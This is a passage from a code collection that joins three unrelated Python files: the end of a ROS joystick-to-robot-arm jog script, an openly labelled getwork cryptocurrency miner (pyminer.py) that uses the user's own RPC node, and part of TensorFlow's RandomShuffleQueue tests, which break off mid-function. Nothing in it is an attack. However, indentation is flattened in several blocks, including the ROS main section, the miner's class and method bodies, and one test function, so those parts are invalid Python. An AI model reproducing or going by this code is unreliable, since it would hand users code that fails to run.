            jog_target[0] = -1*msg.axes[1] #-1
        if msg.axes[1] < 0 and m_xyCompareFlag == 0:
            #m_joyJogFlag = JOG_AXIS_TASK_X
            jog_target[0] = -1*msg.axes[1] #1
        m_xyCompareFlag = 1
        if msg.axes[0] > 0 and m_xyCompareFlag == 1:
            #m_joyJogFlag = JOG_AXIS_TASK_Y
            jog_target[1] = -1*msg.axes[0] #-1
        if msg.axes[0] < 0 and m_xyCompareFlag == 1:
            #m_joyJogFlag = JOG_AXIS_TASK_Y
            jog_target[1] = -1*msg.axes[0] #1
        print(">>>>>>>>>>>>>> jog_target = {}".format(jog_target))
        #r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, m_joyJogVel)
        r.jog_multi(jog_target, MOVE_REFERENCE_BASE, m_joyJogVel)
    else:
        print("33333333")
        # No input at all: stop any active jog and re-arm the D-pad branch.
        if not m_joyAnalogFlag and not m_joyButtonFlag:
            rospy.loginfo("jog stop")
            #r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, 0)
            r.jog_multi([0,0,0,0,0,0], MOVE_REFERENCE_BASE, 0)
            m_joyJogFlag = -1
if __name__ == "__main__":
rospy.init_node('joy_xbox360_py')
rospy.on_shutdown(shutdown)
t1 = threading.Thread(target=thread_stop_watch)
t1.daemon = True
t1.start()
pub_stop = rospy.Publisher('/'+ROBOT_ID +ROBOT_MODEL+'/stop', RobotStop, queue_size=10)
sub_joy = rospy.Subscriber("joy", Joy, joy_cb)
while not rospy.is_shutdown():
pass
client_socket_close(g_sock)
print 'good bye!'
|
pyminer.py | #!/usr/bin/python
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
# Seconds to back off after a failed or malformed RPC response.
ERR_SLEEP = 15
# Initial upper bound on nonces scanned per getwork (Python 2 long literal);
# retuned each iteration from settings['scantime'].
MAX_NONCE = 1000000L
# Populated from the CONFIG-FILE given on the command line (key=value lines).
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcreditRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
    """Truncate x to an unsigned 32-bit value.

    The mask drops the Python-2-only `L` suffix: small int literals
    auto-promote in Python 2, so the value is unchanged while the
    function also works unmodified on Python 3.
    """
    return x & 0xffffffff
def bytereverse(x):
    """Reverse the byte order of a 32-bit word (endianness flip)."""
    swapped = ((x << 24)
               | ((x << 8) & 0x00ff0000)
               | ((x >> 8) & 0x0000ff00)
               | (x >> 24))
    # Inlined uint32() mask: truncate to an unsigned 32-bit value.
    return swapped & 0xffffffff
def bufreverse(in_buf):
    """Byte-swap each 32-bit word of the buffer (per-word endianness flip)."""
    out_words = []
    for off in range(0, len(in_buf), 4):
        (word,) = struct.unpack('@I', in_buf[off:off + 4])
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 4-byte words in the buffer."""
    words = [in_buf[i:i + 4] for i in range(0, len(in_buf), 4)]
    words.reverse()
    return ''.join(words)
class Miner:
    """Single-worker getwork miner (Python 2): scans nonces over double-SHA256."""

    def __init__(self, id):
        # Worker id, used only for the hash-meter printout.
        self.id = id
        # Nonce scan budget per getwork; retuned each iterate() from 'scantime'.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces against one getwork job.

        Returns (hashes_done, nonce_bin): nonce_bin is the winning
        little-endian nonce bytes, or None when no solution was found.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header (shared by every nonce)
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        # Budget exhausted without a solution.
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the getwork data and submit it."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # The nonce occupies hex chars [152:160) of the 256-char data string.
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One mining cycle: fetch work, scan, retune budget, submit if solved."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Size the next scan so it takes roughly settings['scantime'] seconds.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Mine forever against the configured RPC endpoint."""
        rpc = BitcreditRPC(settings['host'], settings['port'],
                           settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Worker-process entry point: mine forever with a dedicated Miner."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # Parse the simple key=value config file.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Defaults for anything the config file did not set.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 9332
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Config values arrive as strings; normalize the numeric ones.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # One mining process per configured "thread".
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        # Block until all workers exit (they normally never do).
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
random_shuffle_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
  # Useful for debugging when a test times out.
  super(RandomShuffleQueueTest, self).setUp()
  tf_logging.error("Starting: %s", self._testMethodName)

def tearDown(self):
  # Log completion too, so a hang can be bracketed in the output.
  super(RandomShuffleQueueTest, self).tearDown()
  tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
  # A single enqueue grows the queue size from 0 to 1.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
    enqueue_op = q.enqueue((10.0,))
    self.assertAllEqual(0, q.size().eval())
    enqueue_op.run()
    self.assertAllEqual(1, q.size().eval())

def testEnqueueWithShape(self):
  # A fixed element shape accepts matching values and rejects
  # mismatched shapes at graph-construction time.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
    enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
    enqueue_correct_op.run()
    self.assertAllEqual(1, q.size().eval())
    with self.assertRaises(ValueError):
      q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))

def testEnqueueManyWithShape(self):
  # enqueue_many splits the 0th dimension into individual elements.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(
        10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
    q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
    self.assertAllEqual(4, q.size().eval())
    q2 = data_flow_ops.RandomShuffleQueue(
        10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
    q2.enqueue(([1, 2, 3],))
    q2.enqueue_many(([[1, 2, 3]],))

def testScalarShapes(self):
  # Mixed scalar/vector components dequeue correctly, both singly and
  # in batches.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
    q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
    q.enqueue([9, [10]]).run()
    dequeue_t = q.dequeue()
    results = []
    for _ in range(2):
      a, b = sess.run(dequeue_t)
      results.append((a, b))
    a, b = sess.run(q.dequeue_many(3))
    for i in range(3):
      results.append((a[i], b[i]))
    self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
                          results)
def testParallelEnqueue(self):
  # One producer thread per element; all elements must arrive.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
    enqueue_ops = [q.enqueue((x,)) for x in elems]
    dequeued_t = q.dequeue()
    # Run one producer thread for each element in elems.
    def enqueue(enqueue_op):
      sess.run(enqueue_op)
    threads = [
        self.checkedThread(
            target=enqueue, args=(e,)) for e in enqueue_ops
    ]
    for thread in threads:
      thread.start()
    for thread in threads:
      thread.join()
    # Dequeue every element using a single thread.
    results = []
    for _ in xrange(len(elems)):
      results.append(dequeued_t.eval())
    self.assertItemsEqual(elems, results)

def testParallelDequeue(self):
  # One consumer thread per element; order is random but the multiset
  # of dequeued values must match.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
    enqueue_ops = [q.enqueue((x,)) for x in elems]
    dequeued_t = q.dequeue()
    # Enqueue every element using a single thread.
    for enqueue_op in enqueue_ops:
      enqueue_op.run()
    # Run one consumer thread for each element in elems.
    results = []
    def dequeue():
      results.append(sess.run(dequeued_t))
    threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
    for thread in threads:
      thread.start()
    for thread in threads:
      thread.join()
    self.assertItemsEqual(elems, results)

def testDequeue(self):
  # Sequential enqueue/dequeue returns the same multiset of elements.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0]
    enqueue_ops = [q.enqueue((x,)) for x in elems]
    dequeued_t = q.dequeue()
    for enqueue_op in enqueue_ops:
      enqueue_op.run()
    vals = [dequeued_t.eval() for _ in xrange(len(elems))]
    self.assertItemsEqual(elems, vals)

def testEnqueueAndBlockingDequeue(self):
  # dequeue blocks on the empty queue until the delayed producer runs.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0]
    enqueue_ops = [q.enqueue((x,)) for x in elems]
    dequeued_t = q.dequeue()
    def enqueue():
      # The enqueue_ops should run after the dequeue op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      for enqueue_op in enqueue_ops:
        sess.run(enqueue_op)
    results = []
    def dequeue():
      for _ in xrange(len(elems)):
        results.append(sess.run(dequeued_t))
    enqueue_thread = self.checkedThread(target=enqueue)
    dequeue_thread = self.checkedThread(target=dequeue)
    enqueue_thread.start()
    dequeue_thread.start()
    enqueue_thread.join()
    dequeue_thread.join()
    self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
  # Two-component tuples round-trip through the queue.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        10, 0, (dtypes_lib.int32, dtypes_lib.float32))
    elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
    enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
    dequeued_t = q.dequeue()
    for enqueue_op in enqueue_ops:
      enqueue_op.run()
    results = []
    for _ in xrange(len(elems)):
      x, y = sess.run(dequeued_t)
      results.append((x, y))
    self.assertItemsEqual(elems, results)

def testQueueSizeEmpty(self):
  # A fresh queue reports size 0.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
    self.assertEqual(0, q.size().eval())

def testQueueSizeAfterEnqueueAndDequeue(self):
  # size() is a scalar op tracking enqueues and dequeues.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    enqueue_op = q.enqueue((10.0,))
    dequeued_t = q.dequeue()
    size = q.size()
    self.assertEqual([], size.get_shape())
    enqueue_op.run()
    self.assertEqual([1], size.eval())
    dequeued_t.op.run()
    self.assertEqual([0], size.eval())

def testEnqueueMany(self):
  # Running the same enqueue_many op twice enqueues the batch twice.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue()
    enqueue_op.run()
    enqueue_op.run()
    results = []
    for _ in range(8):
      results.append(dequeued_t.eval())
    self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
  # Enqueueing a zero-length batch must not change the queue size.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
    empty_t = constant_op.constant(
        [], dtype=dtypes_lib.float32, shape=[0, 2, 3])
    enqueue_op = q.enqueue_many((empty_t,))
    size_t = q.size()
    self.assertEqual(0, size_t.eval())
    enqueue_op.run()
    self.assertEqual(0, size_t.eval())

def testEmptyDequeueMany(self):
  # dequeue_many(0) succeeds with an empty result, full or empty queue.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
    enqueue_op = q.enqueue((10.0,))
    dequeued_t = q.dequeue_many(0)
    self.assertEqual([], dequeued_t.eval().tolist())
    enqueue_op.run()
    self.assertEqual([], dequeued_t.eval().tolist())

def testEmptyDequeueUpTo(self):
  # dequeue_up_to(0) behaves like dequeue_many(0).
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
    enqueue_op = q.enqueue((10.0,))
    dequeued_t = q.dequeue_up_to(0)
    self.assertEqual([], dequeued_t.eval().tolist())
    enqueue_op.run()
    self.assertEqual([], dequeued_t.eval().tolist())

def testEmptyDequeueManyWithNoShape(self):
  # Without fixed component shapes, dequeue_many must fail.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    enqueue_op = q.enqueue((constant_op.constant(
        [10.0, 20.0], shape=(1, 2)),))
    dequeued_t = q.dequeue_many(0)
    # Expect the operation to fail due to the shape not being constrained.
    with self.assertRaisesOpError(
        "require the components to have specified shapes"):
      dequeued_t.eval()
    enqueue_op.run()
    # RandomShuffleQueue does not make any attempt to support DequeueMany
    # with unspecified shapes, even if a shape could be inferred from the
    # elements enqueued.
    with self.assertRaisesOpError(
        "require the components to have specified shapes"):
      dequeued_t.eval()

def testEmptyDequeueUpToWithNoShape(self):
  # Same as above, for dequeue_up_to.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
    enqueue_op = q.enqueue((constant_op.constant(
        [10.0, 20.0], shape=(1, 2)),))
    dequeued_t = q.dequeue_up_to(0)
    # Expect the operation to fail due to the shape not being constrained.
    with self.assertRaisesOpError(
        "require the components to have specified shapes"):
      dequeued_t.eval()
    enqueue_op.run()
    # RandomShuffleQueue does not make any attempt to support DequeueUpTo
    # with unspecified shapes, even if a shape could be inferred from the
    # elements enqueued.
    with self.assertRaisesOpError(
        "require the components to have specified shapes"):
      dequeued_t.eval()
def testMultiEnqueueMany(self):
  # Batched enqueue of two components, run twice.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        10, 0, (dtypes_lib.float32, dtypes_lib.int32))
    float_elems = [10.0, 20.0, 30.0, 40.0]
    int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
    enqueue_op = q.enqueue_many((float_elems, int_elems))
    dequeued_t = q.dequeue()
    enqueue_op.run()
    enqueue_op.run()
    results = []
    for _ in range(8):
      float_val, int_val = sess.run(dequeued_t)
      results.append((float_val, [int_val[0], int_val[1]]))
    expected = list(zip(float_elems, int_elems)) * 2
    self.assertItemsEqual(expected, results)

def testDequeueMany(self):
  # Two dequeue_many(5) calls drain the 10 enqueued elements.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_many(5)
    enqueue_op.run()
    results = dequeued_t.eval().tolist()
    results.extend(dequeued_t.eval())
    self.assertItemsEqual(elems, results)

def testDequeueUpToNoBlocking(self):
  # dequeue_up_to returns full batches while enough elements remain.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_up_to(5)
    enqueue_op.run()
    results = dequeued_t.eval().tolist()
    results.extend(dequeued_t.eval())
    self.assertItemsEqual(elems, results)

def testMultiDequeueMany(self):
  # dequeue_many keeps static shapes; mix with single dequeues to drain.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
    float_elems = [
        10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
    ]
    int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
                 [15, 16], [17, 18], [19, 20]]
    enqueue_op = q.enqueue_many((float_elems, int_elems))
    dequeued_t = q.dequeue_many(4)
    dequeued_single_t = q.dequeue()
    enqueue_op.run()
    results = []
    float_val, int_val = sess.run(dequeued_t)
    self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
    self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
    results.extend(zip(float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_t)
    results.extend(zip(float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_single_t)
    self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
    self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
    results.append((float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_single_t)
    results.append((float_val, int_val.tolist()))
    self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
  # Like testMultiDequeueMany, but dequeue_up_to has no static batch dim.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
    float_elems = [
        10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
    ]
    int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
                 [15, 16], [17, 18], [19, 20]]
    enqueue_op = q.enqueue_many((float_elems, int_elems))
    dequeued_t = q.dequeue_up_to(4)
    dequeued_single_t = q.dequeue()
    enqueue_op.run()
    results = []
    float_val, int_val = sess.run(dequeued_t)
    # dequeue_up_to has undefined shape.
    self.assertEqual([None], dequeued_t[0].get_shape().as_list())
    self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
    results.extend(zip(float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_t)
    results.extend(zip(float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_single_t)
    self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
    self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
    results.append((float_val, int_val.tolist()))
    float_val, int_val = sess.run(dequeued_single_t)
    results.append((float_val, int_val.tolist()))
    self.assertItemsEqual(zip(float_elems, int_elems), results)

def testHighDimension(self):
  # Rank-5 elements round-trip through enqueue_many/dequeue_many.
  with self.cached_session():
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
        (4, 4, 4, 4)))
    elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_many(10)
    enqueue_op.run()
    self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())

def testParallelEnqueueMany(self):
  # Ten threads each enqueue the same 100-element batch.
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        1000, 0, dtypes_lib.float32, shapes=())
    elems = [10.0 * x for x in range(100)]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_many(1000)
    # Enqueue 100 items in parallel on 10 threads.
    def enqueue():
      sess.run(enqueue_op)
    threads = [self.checkedThread(target=enqueue) for _ in range(10)]
    for thread in threads:
      thread.start()
    for thread in threads:
      thread.join()
    self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
  """Same as testParallelDequeueMany but via dequeue_up_to on a full queue."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(
        1000, 0, dtypes_lib.float32, shapes=())
    elems = [10.0 * x for x in range(1000)]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_up_to(100)
    enqueue_op.run()

    # Dequeue 100 items in parallel on 10 threads.
    dequeued_elems = []

    def dequeue():
      dequeued_elems.extend(sess.run(dequeued_t))

    threads = [self.checkedThread(target=dequeue) for _ in range(10)]
    for thread in threads:
      thread.start()
    for thread in threads:
      thread.join()
    self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
  """Parallel dequeue_up_to ops with random sizes partition the contents."""
  with self.cached_session() as sess:
    # The batch sizes sum exactly to the queue capacity, so together the
    # ten dequeues drain the queue.
    dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
    total_elements = sum(dequeue_sizes)
    q = data_flow_ops.RandomShuffleQueue(
        total_elements, 0, dtypes_lib.float32, shapes=())

    elems = [10.0 * x for x in xrange(total_elements)]
    enqueue_op = q.enqueue_many((elems,))
    dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
    enqueue_op.run()

    # Dequeue random number of items in parallel on 10 threads.
    dequeued_elems = []

    def dequeue(dequeue_op):
      dequeued_elems.extend(sess.run(dequeue_op))

    threads = []
    for dequeue_op in dequeue_ops:
      threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
    for thread in threads:
      thread.start()
    for thread in threads:
      thread.join()
    self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
  """dequeue_many blocks until a later enqueue supplies all requested items."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_many(4)

    dequeued_elems = []

    def enqueue():
      # The enqueue_op should run after the dequeue op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      sess.run(enqueue_op)

    def dequeue():
      dequeued_elems.extend(sess.run(dequeued_t).tolist())

    enqueue_thread = self.checkedThread(target=enqueue)
    dequeue_thread = self.checkedThread(target=dequeue)
    enqueue_thread.start()
    dequeue_thread.start()
    enqueue_thread.join()
    dequeue_thread.join()
    self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
  """dequeue_up_to blocks on an empty queue until an enqueue supplies data."""
  with self.cached_session() as sess:
    q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_up_to(4)

    dequeued_elems = []

    def enqueue():
      # The enqueue_op should run after the dequeue op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      sess.run(enqueue_op)

    def dequeue():
      dequeued_elems.extend(sess.run(dequeued_t).tolist())

    enqueue_thread = self.checkedThread(target=enqueue)
    dequeue_thread = self.checkedThread(target=dequeue)
    enqueue_thread.start()
    dequeue_thread.start()
    enqueue_thread.join()
    dequeue_thread.join()
    self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
  """dequeue_many can take its batch size from a dequeued scalar tensor."""
  with self.cached_session():
    # A first queue holds the integer batch sizes.
    batch_sizes = [random.randint(1, 10) for _ in range(100)]
    size_queue = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
    fill_sizes_op = size_queue.enqueue_many((batch_sizes,))
    total = sum(batch_sizes)

    # A second queue holds `total` payload elements.
    payload = [random.randint(0, 100) for _ in range(total)]
    data_queue = data_flow_ops.RandomShuffleQueue(total, 0, dtypes_lib.int32,
                                                  ((),))
    fill_data_op = data_queue.enqueue_many((payload,))

    # Subgraph: dequeue one size, then DequeueMany that many elements.
    batch_t = data_queue.dequeue_many(size_queue.dequeue())
    fill_sizes_op.run()
    fill_data_op.run()

    collected = []
    for _ in batch_sizes:
      collected.extend(batch_t.eval())
    self.assertItemsEqual(payload, collected)
def testDequeueUpToWithTensorParameter(self):
  """dequeue_up_to can take its batch size from a dequeued scalar tensor."""
  with self.cached_session():
    # A first queue holds the integer batch sizes.
    batch_sizes = [random.randint(1, 10) for _ in range(100)]
    size_queue = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
